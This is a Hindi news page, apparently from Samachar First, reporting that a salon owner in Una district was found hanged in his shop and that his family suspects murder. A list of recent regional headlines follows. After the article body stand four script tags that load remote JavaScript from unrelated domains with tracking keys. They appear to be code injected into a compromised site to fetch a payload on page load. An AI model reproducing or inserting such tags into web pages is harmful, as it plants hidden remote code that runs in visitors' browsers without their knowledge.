ऊनाः सैलून के अंदर फंदे से झूलता मिला युवक का शव

<p>ज़िला ऊना में एक युवक की आत्महत्या का मामला सामने आया है। यहां बड़ूही चौक के पास दिलवां गांव में आने वाली दुकानों में सैलून चलाने वाले एक दुकानदार का शव दुकान के अंदर फंदे से झूलता मिला। मृतक की पहचान राजेश कुमार पुत्र जगत राम निवासी धुसाड़ा के रूप में हुई है। जानकारी के अनुसार राजेश पिछले कुछ समय से यहां सैलून चला रहा था। बीती रात वह घर नहीं पहुंचा और दुकान पर ही रूक गया था। आज सुबह कुथ लोगों ने उसे दुकान के अंदर फंदे से लटका हुआ पाया।</p>

<p>स्थानीय लोगों ने इसकी सूचना पुलिस को दी। सूचना मिलते ही पुलिस की टीम मौक़े पर पहुंची और शव को कब्जे में ले लिया। अपने बेटे की रहस्यमयी परिस्थतियों में हुई इस मौत पर स्वजनों ने सवाल उठाए हैं। मृतक के परिजनों द्वारा हत्या का अंदेशा होने के कारण पुलिस ने इसके लिए फॉरेंसिक टीम बुलाई है। सारे मामले की जांच अब फॉरेंसिक टीम करेगी। फ़िलहाल पुलिस छानबीन कर रही है। मृतक राजेश अपने पीछे पत्नी और दो बच्चों को छोड़ गया है।</p>

<p><img src=”/media/gallery/images/image(1710).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1607418586445″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

8 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

9 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

9 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

10 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

10 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

11 hours ago